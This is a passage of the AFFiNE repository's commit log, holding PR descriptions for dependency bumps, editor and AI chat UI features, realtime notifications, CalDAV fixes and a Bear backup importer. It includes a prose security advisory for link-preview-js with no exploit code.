[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for sequence diagrams with drop
shadows, and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add `randomize` config option for architecture diagrams,
defaulting to `false` for deterministic layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: Add option to change timeline direction

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- Fix duplicate SVG element IDs when rendering multiple diagrams on the
same page. Internal element IDs (nodes, edges, markers, clusters) are
now prefixed with the diagram's SVG element ID across all diagram types.
Custom CSS or JS using exact ID selectors like `#arrowhead` should use
attribute-ending selectors like `[id$="-arrowhead"]` instead.

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for ER diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for requirement diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add theme support for data label colour in xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look styling for mindmap diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look for mermaid flowchart diagrams

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for class diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: add showDataLabelOutsideBar option for xy chart

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look support for timeline diagram with drop
shadows, additional redux themes and enhanced styling

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- feat: implement neo look and themes for gitGraph diagram

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add new TreeView diagram

##### Patch Changes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- add link to ishikawa diagram on mermaid.js.org

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- docs: document valid duration token formats in gantt.md

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: ER diagram parsing when using "1" as entity identifier on right
side

The parser was incorrectly tokenizing the second "1" in patterns like `a
many to 1 1:` because the lookahead rule only checked for alphabetic
characters after whitespace, not digits. Added a new lookahead pattern
`"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a
numeric entity name.

Fixes
[#&#8203;7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: scope cytoscape label style mapping to edges with labels to
prevent console warnings

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: support inline annotation syntax in class diagrams (class Shape
<<interface>>)

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Align branch label background with text for multi-line labels in
LR GitGraph layout

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: preserve cause hierarchy when ishikawa effect is indented more
than causes

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- refactor: remove unused createGraphWithElements function and add
regression test for open edge arrowheads

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Prevent long pie chart titles from being clipped by expanding the
viewBox

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: prevent sequence diagram hang when "as" is used without a
trailing space in participant declarations

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: warn when `style` statement targets a non-existent node in
flowcharts

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: group state diagram SVG children under single root <g> element

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: Allow :::className syntax inside composite state blocks

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
Thanks [@&#8203;aloisklink](https://redirect.github.com/aloisklink),
[@&#8203;BambioGaming](https://redirect.github.com/BambioGaming)! - fix:
prevent escaping `<` and `&` when `htmlLabels: false`

-
[#&#8203;7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526)
[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)
- fix: treemap title and labels use theme-aware colors for dark
backgrounds

- Updated dependencies
\[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]:
-
[@&#8203;mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@&#8203;1.1.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-12 16:20:41 +08:00
Abdul Rehman 76d57aa389 feat(editor): allow date picker to navigate back to year 1000 (#14942)
Fixes #14935

## Summary

The date picker had a hardcoded `_minYear = 1970` in
[`date-picker.ts`](blocksuite/affine/components/src/date-picker/date-picker.ts),
which prevented users from selecting dates earlier than 1970. This
blocked legitimate use cases like historical and genealogical research
(see the reporter's comment on #14935).

## Fix

Lower the date picker's `_minYear` from `1970` to `1000`. The underlying
storage is just a `zod.number()` (Unix timestamp in ms), which supports
negative values, so no data-layer or backend changes are required — this
is a UI-only constraint relaxation.

## Demo

<img width="2044" height="1250" alt="image"
src="https://github.com/user-attachments/assets/4b25b333-89c4-48e6-9f91-81781d680200"
/>

## Test plan

- [x] Insert a database in a doc → add a Date column
- [x] Click a date cell → open the picker → click the year label →
navigate back through decades
- [x] Confirm the calendar reaches years well before 1970 (verified at
May 1805)
- [x] Confirm the calendar correctly renders weekdays for historical
dates
- [x] Confirm picking a modern date still works as before

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Date picker now allows selecting dates from year 1000 onward,
expanding historical date coverage.

* **Bug Fixes**
* Navigation (month switches and keyboard arrows) now keeps the
selection cursor within the allowed year range, preventing out-of-range
jumps.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-12 15:47:36 +08:00
DarkSky db0ff0a9df feat(core): migrate more pull to realtime (#14936)
#### PR Dependency Tree


* **PR #14936** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Consolidated realtime subscription patterns for consistent, more
reliable live updates across comments, notifications, transcription
tasks, and embedding progress.
* Standardized realtime room naming and subscription keys for
deterministic delivery.

* **New Features**
* Introduced a reusable live-query mechanism powering realtime snapshot
+ event workflows used by comments, notifications, transcript tasks, and
embedding progress.

* **Tests**
* Added tests covering live-query behavior and deterministic
subscription key generation.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-11 00:33:25 +08:00
DarkSky 8cf00738c2 feat(server): realtime notification & task status (#14934)
#### PR Dependency Tree


* **PR #14934** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Full realtime platform added: live notifications, comments, embedding
progress, and transcription task updates via realtime subscriptions.

* **Chores**
* Frontend switched from polling/GraphQL queries to realtime channels;
legacy query fields marked deprecated and client libs updated to use
realtime APIs.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->


#### PR Dependency Tree


* **PR #14934** 👈
  * **PR #14936**

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-05-10 23:21:50 +08:00
DarkSky 417d31cabe fix(core): ui state (#14933)
#### PR Dependency Tree


* **PR #14933** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
  * Added draft tab option to AI chat interface
* Introduced "Current document" session history view in chat history
popover
  * Added control to show/hide "New Chat" button

* **Improvements**
  * Enhanced chat history preservation when switching between sessions
  * Prevented duplicate session creation requests
  * Improved message handling during session transitions and generation


<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-09 23:33:37 +08:00
DarkSky fcc45a3f44 fix(server): caldav compatibility (#14930)
fix #14411
fix #14909 

Some CalDAV servers do not implement standard responses; add
compatibility for these servers.


#### PR Dependency Tree


* **PR #14930** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Improved CalDAV discovery error handling to gracefully fall back when
the server returns certain error statuses.

* **New Features**
* CalDAV account linking now returns the number of discovered calendars
associated with the account.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-09 02:40:47 +08:00
DarkSky bcbde16c04 feat(server): native safe fetch (#14931) 2026-05-09 02:40:25 +08:00
DarkSky 32a94d68dc chore: add utils 2026-05-09 02:32:10 +08:00
DarkSky 5813e7dd77 chore: update i18n 2026-05-07 11:32:55 +08:00
karl-kaefer ac37d07e74 feat(editor): add Bear backup import and markdown zip folder hierarchy (#14599)
## Summary

- Add Bear `.bear2bk` backup importer (TextBundle-based zip format)
- Enhance markdown zip import to preserve folder structure from zip
paths
- Add colored highlight (`<mark data-color="...">`) support to HTML
adapter

### Bear Import Details

Bear backups are zip archives of TextBundle directories. The importer:
- Parses Bear-specific markdown (highlights `==text==`, callouts `>
[!NOTE]`, inline tags `#tag`)
- Extracts creation/modification dates from `info.json` metadata
- Filters out trashed notes
- Converts Bear tags to AFFiNE tags (consolidated by root segment)
- Builds folder hierarchy from nested tag paths (e.g.,
`#work/projects/alpha`)
- Uses JSZip for lazy decompression to handle large backups without OOM

### Markdown Zip Folder Hierarchy

`importMarkdownZip` now returns `{ docIds, folderHierarchy }` instead of
just `docIds[]`, enabling the UI to recreate the zip's directory
structure as AFFiNE folders.

## Related Issues

- Implements the TextBundle-based import approach suggested in #14115 /
Discussion #14142
- Addresses folder structure preservation requested in #10003
- Partially addresses frontmatter metadata import from #11286

## Test Plan

- [ ] Import a Bear `.bear2bk` backup file via the import dialog
- [ ] Verify tags are created and assigned to documents
- [ ] Verify folder hierarchy matches Bear's nested tag structure
- [ ] Verify creation/modification dates are preserved
- [ ] Verify highlighted text and callouts render correctly
- [ ] Verify images and attachments are imported
- [ ] Import a markdown zip with nested folders, verify folder structure
is recreated
- [ ] Verify trashed Bear notes are excluded

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Bear (.bear2bk) backup import: bulk import notes, convert/dedupe tags,
create nested folders, and return imported doc IDs plus folder
hierarchy; UI import option and progress integrated.
* Markdown ZIP import now returns an optional folder hierarchy alongside
created doc IDs.

* **Bug Fixes / Improvements**
* Highlighting: mark elements validate color names, default safely, and
apply consistent background styling.

* **Chores**
  * Added runtime dependency for ZIP handling.

* **Documentation**
  * Added localization strings and i18n accessors for Bear import UI.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 11:29:40 +08:00
renovate[bot] 429e7f495d chore: bump up link-preview-js version to v4.0.1 [SECURITY] (#14917)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[link-preview-js](https://redirect.github.com/OP-Engineering/link-preview-js)
| [`4.0.0` →
`4.0.1`](https://renovatebot.com/diffs/npm/link-preview-js/4.0.0/4.0.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/link-preview-js/4.0.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/link-preview-js/4.0.0/4.0.1?slim=true)
|

---

### link-preview-js vulnerable to IPv6 and internal loopback attacks
[CVE-2026-43897](https://nvd.nist.gov/vuln/detail/CVE-2026-43897) /
[GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

<details>
<summary>More information</summary>

#### Details
##### Impact
The library did not check for IPv6 loopback attacks. There was also a
DNS attack, where an address could be resolved into an internal IP. This
could cause internal data leaks.

##### Patches
Problem has been patched in version 4.0.1. However, it cannot be
completely solved by the package alone. The regex used for validation
has been tightened for IPv6 addresses.

The DNS resolving, however, is more difficult. The regex has been
tightened to prohibit .internal, .local, .nip.io and .sslip.io
addresses, however there can be other services not on the list,
therefore it is imperative that users use the resolveDNSHost option to
do DNS resolution before fetching content. To that regard a (scary)
error message has been added when the option is not set.

##### Workarounds
Users can do their own validation before fetching content.

Reported by https://github.com/Andrew-most-likely

#### Severity
- CVSS Score: 8.7 / 10 (High)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N`

#### References
-
[https://github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/OP-Engineering/link-preview-js/security/advisories/GHSA-4gp8-rjrq-ch6q)
-
[https://github.com/OP-Engineering/link-preview-js/pull/179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)
-
[https://github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede](https://redirect.github.com/OP-Engineering/link-preview-js/commit/4396d48909fab37553c0e93e26447fe218363ede)
-
[https://github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)
-
[https://github.com/advisories/GHSA-4gp8-rjrq-ch6q](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-4gp8-rjrq-ch6q)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>OP-Engineering/link-preview-js (link-preview-js)</summary>

###
[`v4.0.1`](https://redirect.github.com/OP-Engineering/link-preview-js/releases/tag/4.0.1)

[Compare
Source](https://redirect.github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1)

#### What's Changed

- Loopback fixes by
[@&#8203;ospfranco](https://redirect.github.com/ospfranco) in
[#&#8203;179](https://redirect.github.com/OP-Engineering/link-preview-js/pull/179)

**Full Changelog**:
<https://github.com/OP-Engineering/link-preview-js/compare/4.0.0...4.0.1>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-07 11:29:35 +08:00
Davide Conte 339f89220a fix(core): prevent navigation panel from reordering while typing (#14831) 2026-05-07 11:28:19 +08:00
Adarsh Singh 440ff0c342 fix(editor): resolve UX inconsistencies in the AI chat interface (#14850)
# Closes #14189.

Fixes the three UX issues reported in the original bug report, plus one
small adjacent polish on the right-sidebar toggle that was requested
during review.

Each concern in the issue is addressed end-to-end, with the same
treatment applied to both places the AI chat panel lives: the **sidebar
chat panel** (right panel on a doc page) and the **standalone `/chat`
page**.

---

## 1. `+` button → persistent multi-session tabs (issue point 1)

**Before:** clicking `+` called `createFreshSession()` (standalone) or
`newSession()` (sidebar), both of which tore down the current chat
content and replaced it in place. There was no way to keep two chats
open at once.

**After:** a browser/IDE-style tab strip lives above the chat content.
Each open session gets its own tab with a close `×`; the active tab is
highlighted; `+` now adds a tab rather than replacing the chat.

### Details
- New Lit component `ai-chat-tabs`
  ([packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-tabs.ts)).
- Tab title is derived from `session.title` → first user message →
  `"New chat"`.
- Horizontal scroll when tabs overflow, with a `wheel` handler that
  converts mouse wheel / trackpad vertical swipe into horizontal scroll
  (native horizontal trackpad swipes also work natively via
  `overflow-x: auto`).
- Auto `scrollIntoView({ inline: 'nearest' })` on active tab change, so
  a newly created or newly selected tab slides into view instead of
  staying hidden behind the toolbar.
- Close `×` removes the tab from the strip but leaves the session on the
  server (matches the existing **Chat history** dropdown semantics — the
  session is still reachable there). Closing the active tab switches to
  an adjacent one; closing the last tab starts a fresh session.
- Persistence: open session IDs are saved per-workspace in
  `localStorage` under `ai-chat-open-tabs:{workspaceId}`. On mount, the
  React pages hydrate those IDs via `AIProvider.session.getSession` /
  `CopilotClient.getSession` — no new backend or schema work.
- Wiring: identical effects on both variants
  ([chat.tsx (sidebar)](packages/frontend/core/src/desktop/pages/workspace/detail-page/tabs/chat.tsx)
  and
  [chat/index.tsx (standalone)](packages/frontend/core/src/desktop/pages/workspace/chat/index.tsx))
  — hydrate → sync active session into tabs → persist.
- The tab strip sits on the same row as the existing toolbar icons
  (pin / history / `+`), separated by `flex: 1` + `min-width: 0` so the
  tabs scroll cleanly up to the toolbar boundary.
- The `ShadowlessElement` base class injects its static CSS globally,
  and the `:host` selector does not match in a React-rooted DOM — the
  component uses tag-selector CSS (`ai-chat-tabs { display: flex; … }`)
  instead.

## 2. Drag-and-drop attachments (issue point 2)

**Before:** the chat input accepted no DnD. Attaching anything required
the `+` → file-picker flow.

**After:** the chat input accepts OS files via native HTML5 DnD and
AFFiNE documents via the repo's existing pragmatic-drag-and-drop
infrastructure.

### Details
- Native handlers (`dragenter/over/leave/drop`) on
  [ai-chat-input.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-input/ai-chat-input.ts)
  accept OS files: images go into the image preview grid, other files
  become attachment chips, with the same 50 MB per-file cap as the `+`
  picker.
- Internal AFFiNE document drags from the nav panel land as doc chips,
  handled via `dropTargetForElements` from
  `@atlaskit/pragmatic-drag-and-drop` (same library the rest of the app
  already uses for internal DnD).
- A "Drop to attach" overlay appears during drag, reusing the existing
focused-border token (`--affine-v2-layer-insideBorder-primaryBorder`)
for
  visual consistency with the focused state.
- The image/file routing logic that previously lived inline in
  `add-popover.ts` was factored into a shared helper
  [attachment-utils.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-chips/attachment-utils.ts)
  (`addFilesToChat`), so the `+` picker and the drop handler stay in
  lockstep.
- Analytics: extended the `addEmbeddingDoc.control` union in
[events.ts](packages/frontend/track/src/events.ts) with `'dragDrop'` so
  drag-originated attachments are distinguishable from button-initiated
  ones in telemetry.
- `@atlaskit/pragmatic-drag-and-drop` is promoted from a transitive
  dependency (via `@affine/component`) to a direct dependency of
  `@affine/core` and `yarn.lock` is refreshed accordingly.

## 3. Chat-history tooltip + icon (issue point 3)

**Before:** hovering the chat-history button showed a tooltip whose
background did not invert for dark theme (`--affine-tooltip` is not
theme-aware), and the icon was `ArrowDownSmallIcon` — a chevron that
does not convey "history."

**After:** the tooltip primitive itself is theme-aware (every tooltip in
the app benefits, not just the chat one), and the icon is the
semantically-clear `HistoryIcon`.

### Details
- [tooltip.ts](blocksuite/affine/components/src/tooltip/tooltip.ts) now
  uses `var(--affine-v2-tooltips-background, var(--affine-tooltip))` and
  `var(--affine-v2-tooltips-foreground, var(--affine-white))`. The V2
  tokens auto-invert with theme; the old vars remain as fallbacks so
  components that override via the existing `tooltipStyle` escape hatch
  continue to work.
- Triangle arrow colors updated to use the same V2 token.
- [ai-chat-toolbar.ts](packages/frontend/core/src/blocksuite/ai/components/ai-chat-toolbar/ai-chat-toolbar.ts):
  `ArrowDownSmallIcon` → `HistoryIcon`; added
  `data-testid="ai-panel-chat-history"` for future e2e coverage.

## 4. Right-sidebar toggle: tooltips + open-state icon *(adjacent polish)*

Not part of the original issue, but surfaced while testing the tab strip
— neither of the two right-sidebar toggle buttons had hover affordance,
and both used the same icon regardless of the sidebar's state.

- Added `tooltip="Open sidebar"` on the route-container button shown
  when the sidebar is hidden.
- Added `tooltip="Close sidebar"` on the sidebar-header button shown
  when the sidebar is expanded.
- The close button now renders a small inline `RightSidebarOpenIcon`
  variant: same outline as `RightSidebarIcon`, but with the right panel
  filled in the AFFiNE accent color to convey the open state. Icon shape
  change is self-contained — no new icon asset added to
  `@blocksuite/icons`.

---

## Commits

- `2adc0c7` — fix(ai-chat): theme-aware tooltip + semantic chat-history
icon *(2 files)*
- `bf26974` — feat(ai-chat): drag-and-drop file and doc attachments in
chat input *(7 files)*
- `fca29c8` — feat(ai-chat): persistent multi-session tab strip *(8
files)*
- `7d5dffe` — feat(workbench): tooltips and open-state icon for the
right-sidebar toggle *(2 files)*

Kept ordered smallest → largest blast radius so the history is easy to
bisect.

---

## Test plan

Verified locally against a fresh server stack (postgres / redis /
mailpit via compose, migrations run) signed in as `dev@affine.pro`, in
both `/chat` and the sidebar chat on a doc page, in light and dark
themes:

- [x] Tooltip: hover the chat-history icon in dark mode → tooltip is
dark-on-light; toggle to light mode → tooltip is light-on-dark. Existing
tooltips on other surfaces (slash menu, edgeless, linked-doc) still
render correctly.
- [x] Icon: chat-history button renders the history glyph (clock), not a
chevron.
- [x] Drag-and-drop (OS file): drop a PDF / PNG / TXT onto the input →
overlay shows → chips/images appear; file > 50 MB → rejected silently
(same as `+` picker).
- [x] Drag-and-drop (internal doc): drag an AFFiNE doc from the nav
panel → becomes a doc chip.
- [x] Pin-picker, `+` picker, paste-image — all unchanged.
- [x] Tab strip: first chat auto-becomes a tab on first message; `+`
adds tab; click tab switches chat; `×` removes tab and switches to
adjacent; close last tab → new fresh tab spawns.
- [x] Reload browser → tab strip rehydrates from localStorage with the
same sessions.
- [x] Tab overflow: 12+ tabs → horizontal scroll via trackpad vertical
swipe, trackpad horizontal swipe, and mouse wheel; active tab
auto-scrolls into view on `+` click.
- [x] Right-sidebar: hover both toggle buttons → tooltips appear; open
the sidebar → close button shows the filled right-panel icon.
- [x] `yarn lint:ox` and lint-staged both clean on every commit.

Not verified locally (no local model key configured): the assistant
actually streams a response. Drop/chip flow is independent of that path.

## Out of scope / follow-ups

- No new unit or Playwright tests — the fixes are visually verifiable
  and reuse existing reducer / state paths. Happy to add tests if
  reviewers prefer.
- `@affine/native` is not required for the web dev stack; I only built
  `@affine/server-native`. Irrelevant to the PR diff.


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Multi-tab chat UI with a tabs component, open/close/switch actions,
and per-workspace persistence/restoration.
  * Drag-and-drop attachments into chat input (files and docs).

* **UI/UX**
  * Tooltip theming moved to v2 variables (includes arrow color).
  * Sidebar toggle/close buttons now show tooltips.
  * “Drop to attach” overlay and updated history icon.

* **Behavior**
  * Unified attachment handling with 50MB validation and toast notices.

* **Analytics**
  * Attachment events record drag-and-drop as a control method.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-05-07 04:04:43 +08:00
DarkSky eb9cc22502 feat(server): refactor for byok (#14911) 2026-05-07 04:03:14 +08:00
DarkSky 4e169ea5c7 fix(editor): cross browser test stability (#14897)
#### PR Dependency Tree


* **PR #14897** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved reliability of shape and connector detection by forcing full
DOM renders during waits.
* Fixed race conditions in code-block theme loading and cleanup when
components unmount.
* Refined viewport element discovery to correctly handle
rotated/canvas-layer elements and avoid stale DOM removal.

* **Tests**
  * Increased polling timeouts and retries to reduce flakiness.
* Disabled per-file parallelism and ensured test setup performs full
cleanup before starting; extended test timeout.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 20:07:40 +08:00
Ahsan Khaleeq 9e412f58ec feat(editor): add collapse/expand functionality to code block component (#14884)
This PR fixes #14040 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Code blocks can be collapsed and expanded via a toolbar toggle
(visible when the document is editable).
* Collapsed code blocks show a limited preview (~8 lines) with a bottom
fade overlay and reduced padding.
* Toolbar button updates icon and tooltip to reflect collapsed/expanded
state.
* Collapse state is preserved on the block so its current
collapsed/expanded setting is retained.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 05:07:42 +08:00
Aisha Roslan 5d234ad6a8 fix(editor): single-letter tags in select/multi-select table cell (#14808)
### Summary of Changes
Resolves #14715 and #14280.

When a user types into a **Select/Multi-Select** table cell to
create/choose a tag, that character is stashed on the cell container
(setTagDraft) instead of going through valueSetFromString. Opening the
tag picker reads it via consumeTagDraftFromTableCellHost.

### Verification
- Added unit test to check that single-character input doesn't
immediately call valueSetFromString.



https://github.com/user-attachments/assets/432b2693-52f9-4ab4-a694-8440aea007a3



<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **New Features**
* Tag selection popups now initialize with draft text from keypresses in
tag columns, improving user experience when editing tags.

* **Tests**
* Added comprehensive hotkey tests for single-select and multi-select
tag column behavior.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-04 03:58:18 +08:00
DarkSky 1ad088398f fix(server): test & schema 2026-05-04 03:56:14 +08:00
Aisha Roslan 74d5ebad13 fix(editor): stretch latex preview content (#14857)
### Summary of Changes
